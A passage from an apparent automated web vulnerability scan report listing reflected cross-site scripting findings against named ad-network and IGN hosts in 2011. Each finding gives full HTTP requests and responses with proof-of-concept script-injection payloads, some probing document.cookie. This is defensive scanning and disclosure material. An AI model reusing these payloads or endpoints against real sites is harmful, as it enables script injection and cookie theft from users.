Cookie: adImpCount=FM4QLcaMabkQsarcOBMTT_qd1v3GGeBcoJK0MOl0KG-Y481wEkFtGX7HudJA1SwJY9n9GIWJHDTqbWbTuEexfNzeQdD3uMEbsSJGoH6nZcvCzn_rbeUw4N91a2HFDwx7Wl6PMIbl8VoYkne2SJkXTcTcqhcYEXFRrx1COjt-xQdPBFgEFn33aBMbAqV_0XEIioGKZSAftgkVYZTzRayYVmmTJdkIn7237siDdt9MzJqJi5T6FYiHf9o35IlREqTNFveKpsZQ30qpNKi15RJt04BNhaXhDlSq6EvznmypgJEkna5GLuKLpEu7eZEeTMi7F6sK_rp2soXzwueUGRFartfze4TUjaNUIXjW8HpTdIXW8uxzXCZHw_1hR9tJint6dsPDEFhRxd_Mub3GEI1LN-tHiIt90vCIZrFIVkRcrTHWSuqW6r5ZIwUtscKD_QT9RhXOUlzX0--TPsid5EqGlKaR8fzj-CgEMyGy4iMXI1WxKbXh9CKgY6S3LP_zmj75AgqPmyW7n-K57XLwzviwi0UeS0QSNHqXIchkIsQCETGT3yD6yFHAIahzcKETB33UwCPq2GhFCxYySztyqVkKk9fqbN4-YU4FEz0wwkD5vsFOGK_87tDq8e92tNo34emrEgGEUj-NO1cCBiKRN0KNH1ftcOyrV1OLoU5x9aMp-92fSDdx8Pm4E6I95eyuD_EIQOJmu9RYL7YOIJ6DsZdIlrLgwokXGxtO8_jRpe316oYDuH7CMSEB_S7o6Xm3tvDBfH77IJVG0N6dycTdcjtOKF0Cz2TbSViJ-oT4nVLBUOQ7zE-OOnjPRQ6BZXJCY0oCMrkBfNspHfysXvb7GqOmGNAITbT7Z6AmMx12CVhoBV8PCKPJoslzeIPsOadDQ5GApTHEeUcb_20FLCe61hOZos4ND7pDMbh_Nz4asivfvnRRu_fmnuOn7vvqoBU15Zmhn2aVSJry2cIXXaBci8YswRWnz3-1lFmH8NpHbFKrPy3hBObtf8ALhKpons6mVN9Ng_E4yJzpnqztVh_CB-KMHlM4At-mEES-WC-9xjj3t3cnzJw50Wq6BglWv58k-98YkSbTm3kPOUdWBiWoLi0oN0AgeHAdeFjGHSfjDkMzE5p5e_oJDB2Um-liToPNlmN15FjrbRSBV8G9GwEgDofeTOxem0_gMApf3YWMEr3kQAQnXe4HjQMTBDROpzYRLGofXKwaWNtdj1-GtHzOUqyENh2k1W2pFwJOjkpENaGP0tqhG0BtDC_eTH_Ts10GvA6WhyC22lBHkEPeNKFx7RiTWcHRNLuEX2-svGHkdhG53xdJo9qHwXLy45nY7LSpUbn803gUXikBp5CFzTHxBLV0jIUUb9PGuTCtW-hvx86uIjCl7RrDpkAZSszkN92RjKcOSHyDTphfUd0ZqQTAbIYvZtNr_wQwmIEY35OpKNWhyGwNPlAh_ANj4laYRoTBJxnGQ7wgWZt0CSpxlrfASU5W2a6su59vlF-h6V4zet13tlPhRMEiyYm825vPff2nJDmVgFpIKs_vIo7sFsppJ43d8oTEgInxyFT6vScD8wD9aZjmMC0w6HS0HlWcNr1j-PhGS2ikng608Ubz0iz0TtbwhgQZq5IdyfSisA1KqAwL3sZErWVr76O0bqQTEPkhkBBP4vNeu_uKiDKKl73FedJ05pAh6qV14YUcXNrVmSSI1FzEzQ65n9aZSqRKUiLFvw0_FzJQi642bOf20jjwau1yNWbWc_OZc_OPEEY_dnkrDVdmeoMCTOxN_xl7C-3y_RTPHX8tA53fNzl8qfH897V8IhWPCe1DLrZ9lRQtTCZwINCJg6hyABA61hUJaqPVyX7fV7Pa1PW0-yYXb_USKuin2pZCaBr_uY_2UBH6Bm4UktJmd6sVQvXXEqhe9E5LsneRLFWbUdQszzXxD5egB584f5Iq0VaWXCofBTTX6PHG8K6lFCCN0TTnR1jCog1stnuLrLH_TLw0g_9l8j595C25K_O7nXuUqzkznnHJS2oIivO1MtzkhTD8tggahFLAwdtimGiAzgIbfwh3tPXiXBZiPEc6jmaSPplk32IRb7Tl08IFN1OghxmtWT_y47n5TtZS9Ky93uZuiaOzgh6RPqobZokxjCycBjwJJ-OqeZ3YCRoZ5XICuXWVHfipzGbbMT7XgVwScM8a1QBrHN9hJ559oPfWNXLGQYJF8WI3xWHXIXB86oJHZOjQy7IdFPhSTsF2yrOAh9s72IpPTbIy0ryOZR5kHQoGKZaDQPufKDCKOsAs5UyVIQTo0ztnk49jL0nNFaq4usSu0TQiqXjP7CIAd_5FtzMDApKZjTZ9VwWqS_hi3W5FLLAcz8HdwETYSzM0iqfAGlpVHegt_TIDru8ZVGlo2JchDi2BE0kETeswJqfjIM8eqB1CZXkSQ7Z_VjVnYvzBVNyB9AksqD2lQZb2X0IEqN843HNpf9LL79Gl1KBsoCUhcPx0GvFd6LDM_NesCTjn8qfPanRhqfFt_Mz5uEh2A3HFoGkf8ppxZxL6925r_GgrDoF5KcCR0z_dNX3kzjeRcgqW8BhR69hQhpeZrZnEJ52ohaD3WrTkTUj4YJ6Td6PLaDgaJxtMnnZrfAlG0SSD0cpxrho96Q5aYPi9en1l66z-sdlCvM2HwHHvukFOG1d5EaBIpvNzbIjvRqOmzYDhYzHqcbaWBj06fa97gFmB5jdUYj5pSK3CD2Yuk0PK5FYetxUklFsdind5sgdq4uZcD2KLx9Zf7jaxnwz6suaPAnsGTiQgiUvKmhf1LhrytQYKxDy-h4T29iDJXVr_vHZNnZTSMo3FOqO76V7e32Mz948gl-62XtaGUS8uw5NCpnBNXGUaigKHIg84ueIc4t5Yp3YWsvWh2i358DyJOyzgpnBHfTKfL-U_Busa7oEsjSep6DjzyTifPlN_P4smDk3kLq_iHqbXQ5svnKXdR0fKJFj2seLH8BbDFMsPiVsBIQ44v1dSgCalvY0FxkkJ5w0OZeWQP34jwLIAF168EspxmNyBZAxjbmEt8kjG7dRMykkE2LHXhz6x23r28D5B1-HnnnOalxwc8pVPIG67O2v9MtuGBypG0oO1sVM2Vbs7HFOP9G8F0R3RxUgEDCioFUEKPhCNOF99OExqDKIS0y-D3H8kAPjeIydjzyH2Ws7PKyE1dGY4WEg1BMpUBtxwX2H-7BKKuqPq2iSXQ7keQevoGn3niEhwrkx3I523rYfTIHt_4ntge3wT6HrPHWBJpD6Hr91CxZq9sV9Jmp33y8raIDjGaQc_8c0sEToR_ODvxgcgJ32KFhukOoA2cRquiPMf-CiwpIi4ayv6yWP-tXJ__VAnBFQL8j9ZaHEtyQCLoYLPIaWZ3CmWGBp_xNH3WlqbXOyrf_ATBbMNQCTCxOAxrjPhFf5rtBKDWKm24urmdIW_ZXAbYCZmLsz6YiVpaNRjSC9cVWjph0vEeVDn94cCqpnjE0z1BuYxXU6aN8KvfgQRgY4ZaCnGHk-ja9faWwfL-_-bPH3YFMHRKzulr4fOZJphXH_Th5iLN0VczjS8Jh9TEFyiFtC1iUdTIWwbUQ3HeHZgtn1yA0PmWEs3TAjOPMDh8jx0WcV7eT-TG33S7CRXLm9kG5yXyNmxCrzJ; fc=8Kodsw1QIRNJBnpSjhgJ0uErbJkTJYsNaCBFpaSI5yP-4Y1aL5T0hqj7dZyIiRNIWMZgDtcnKM_xOWbKnaMIO3_WyzVPxgN3VkTg_cPuFqziwJJKZupkpjfaBrjFc6z7RfOX1MD02-o6SZ1b0c_HcUiZ1Q4B83ZCB0ZNq2R2Ygc; pf=vcPDWdxa5bRnzYCFna8dt7hwFpEjJFamBf-ed9eCgkru2q8_Jo62qDoNU1sRcsTDbsXLbP8cgvu5kdFpiCdvW34lLZyvKs0UYrWi2iSsDx65o3Pzwoz6403H7SSItm-xFnOkZRhnTAf1OsSeg86x6N9he2SzgZbMiSxi7XoC0oDOTz_hW1W1inw2PPTXkr5M6IAD_gZxI523_TIIsV7tK-AIolHB94EOuCprrHzPsXFXUf33lMkSWcP-I3s4DQm5; uid=3011330574290390485; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C1005; rds=14987%7C15011%7C15011%7C15012%7Cundefined%7C15011%7C15011%7C15011%7C15011%7C15011%7C15011%7C15011%7C14983%7C15011%7C15003; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Sat, 06-Aug-2011 02:33:21 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 07 Feb 2011 02:33:20 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&rnd=4570044593317657583&fpid=933c7"><script>alert(1)</script>c46c0426e93&nu=n&t=&sp=n&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

3.48. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.lucidmedia.com
Path:   /clicksense/admeld/match

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 482b7'%3balert(1)//1faf0348dc7 was submitted in the admeld_adprovider_id parameter. This input was echoed as 482b7';alert(1)//1faf0348dc7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /clicksense/admeld/match?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=73482b7'%3balert(1)//1faf0348dc7&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us?t=1297045601273&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3Fign105ab01%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E958cbd566d4&refer=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2=2r4Mi92x-Y-; 1609092=00000000001

Response

HTTP/1.1 200 OK
Cache-control: no-cache, no-store
Content-Type: text/plain
Date: Mon, 07 Feb 2011 02:26:28 GMT
P3P: CP=NOI ADM DEV CUR
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: 2=2r4Mi92x-Y-; Domain=.lucidmedia.com; Expires=Tue, 07-Feb-2012 02:26:28 GMT; Path=/
Set-Cookie: 1609092=00000000001; Domain=.lucidmedia.com; Expires=Tue, 07-Feb-2012 02:26:28 GMT; Path=/
Content-Length: 192
Connection: keep-alive

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/match?admeld_adprovider_id=73482b7';alert(1)//1faf0348dc7&external_user_id=3297869551067506954"/>');

3.49. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.lucidmedia.com
Path:   /clicksense/admeld/match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f8e99'%3balert(1)//df4307a598c was submitted in the admeld_callback parameter. This input was echoed as f8e99';alert(1)//df4307a598c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /clicksense/admeld/match?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchf8e99'%3balert(1)//df4307a598c HTTP/1.1
Host: admeld.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us?t=1297045601273&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3Fign105ab01%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E958cbd566d4&refer=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2=2r4Mi92x-Y-; 1609092=00000000001

Response

HTTP/1.1 200 OK
Cache-control: no-cache, no-store
Content-Type: text/plain
Date: Mon, 07 Feb 2011 02:26:31 GMT
P3P: CP=NOI ADM DEV CUR
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: 2=2r4Mi92x-Y-; Domain=.lucidmedia.com; Expires=Tue, 07-Feb-2012 02:26:31 GMT; Path=/
Set-Cookie: 1609092=00000000001; Domain=.lucidmedia.com; Expires=Tue, 07-Feb-2012 02:26:31 GMT; Path=/
Content-Length: 192
Connection: keep-alive

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/matchf8e99';alert(1)//df4307a598c?admeld_adprovider_id=73&external_user_id=3297869551067506954"/>');

3.50. http://ads.adxpose.com/ads/ads.js [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adxpose.com
Path:   /ads/ads.js

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 543f1<script>alert(1)</script>501477c8a8d was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ads/ads.js?uid=amRZRPmRXMjwy5CP_1630363543f1<script>alert(1)</script>501477c8a8d HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/177/ignus/300x250/ign_front?t=1297040536334&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fcheats.ign.com%2F%3F7cd43%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ebc6f5a7fbe9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F4
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A0C863B2E23E60DAB8555153C303FBD7; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 07 Feb 2011 01:03:45 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...
E_LOG_EVENT__("000_000_3",b,i,"",Math.round(V.left)+","+Math.round(V.top),L+","+F,z,j,k,s,P)}}q=n.inView}}}if(!__ADXPOSE_PREFS__.override){__ADXPOSE_WIDGET_IN_VIEW__("container_amRZRPmRXMjwy5CP_1630363543f1<script>alert(1)</script>501477c8a8d".replace(/[^\w\d]/g,""),"amRZRPmRXMjwy5CP_1630363543f1<script>
...[SNIP]...

3.51. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85eca"-alert(1)-"6337c1d9bd9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=1x1&section=1678185&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_dataprovider_id=11&admeld_callback=http://tag.admeld.com/pixel&85eca"-alert(1)-"6337c1d9bd9=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/177/ignus/300x250/ign_front?t=1297040536334&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fcheats.ign.com%2F%3F7cd43%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ebc6f5a7fbe9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F4
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:04:26 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 07 Feb 2011 01:04:26 GMT
Pragma: no-cache
Content-Length: 5050
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?85eca"-alert(1)-"6337c1d9bd9=1&Z=1x1&admeld_callback=http%3a%2f%2ftag.admeld.com%2fpixel&admeld_dataprovider_id=11&admeld_user_id=6acccca4%2dd0e4%2d464e%2da824%2df67cb28d5556&s=1678185&_salt=4252970181";var RM_POP_COOKIE_NAME='ym
...[SNIP]...

3.52. http://au.ign.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://au.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66893"-alert(1)-"f7383b9f650 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?66893"-alert(1)-"f7383b9f650=1 HTTP/1.1
Host: au.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:11:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:11:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c04-13836-971151739-3;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:11:23 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041083649v-1n-12mc+1297041083649mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 184138

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>Video Games, Cheat
...[SNIP]...
<script>
   if(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://au.ign.com/?66893"-alert(1)-"f7383b9f650=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

3.53. http://au.ign.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://au.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c49dc"><script>alert(1)</script>ff0d8373217 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?c49dc"><script>alert(1)</script>ff0d8373217=1 HTTP/1.1
Host: au.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:11:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:11:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c03-27586-1049822303-4;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:11:07 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041067781v-1n-12mc+1297041067781mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 184215

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>Video Games, Cheat
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://au.ign.com/?c49dc"><script>alert(1)</script>ff0d8373217=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

3.54. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 9ae6f<script>alert(1)</script>fb23142505d was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=39ae6f<script>alert(1)</script>fb23142505d&c2=6035537&c3=4732978&c4=40554329&c5=56586626&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://delb.opt.fimserve.com/adopt/?r=h&l=10000001&pos=leaderboard&rnd=167275655
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 14 Feb 2011 00:56:26 GMT
Date: Mon, 07 Feb 2011 00:56:26 GMT
Connection: close
Content-Length: 3603

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
MSCORE.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"39ae6f<script>alert(1)</script>fb23142505d", c2:"6035537", c3:"4732978", c4:"40554329", c5:"56586626", c6:"", c10:"", c15:"", c16:"", r:""});

3.55. http://b.scorecardresearch.com/beacon.js [c10 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload bc307<script>alert(1)</script>c7e2144cf48 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=18&c4=13378&c5=&c6=&c10=3189128bc307<script>alert(1)</script>c7e2144cf48&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://delb.opt.fimserve.com/adopt/?r=h&l=22002200&pos=leaderboard&rnd=316990301
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 14 Feb 2011 02:17:50 GMT
Date: Mon, 07 Feb 2011 02:17:50 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"18", c4:"13378", c5:"", c6:"", c10:"3189128bc307<script>alert(1)</script>c7e2144cf48", c15:"", c16:"", r:""});

3.56. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload f4867<script>alert(1)</script>f5db88b0abc was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=18&c4=13378&c5=&c6=&c10=3189128&c15=f4867<script>alert(1)</script>f5db88b0abc HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://delb.opt.fimserve.com/adopt/?r=h&l=22002200&pos=leaderboard&rnd=316990301
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 14 Feb 2011 02:17:50 GMT
Date: Mon, 07 Feb 2011 02:17:50 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"18", c4:"13378", c5:"", c6:"", c10:"3189128", c15:"f4867<script>alert(1)</script>f5db88b0abc", c16:"", r:""});

3.57. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload c2ee2<script>alert(1)</script>bd3b80d854e was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035537c2ee2<script>alert(1)</script>bd3b80d854e&c3=4732978&c4=40554329&c5=56586626&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
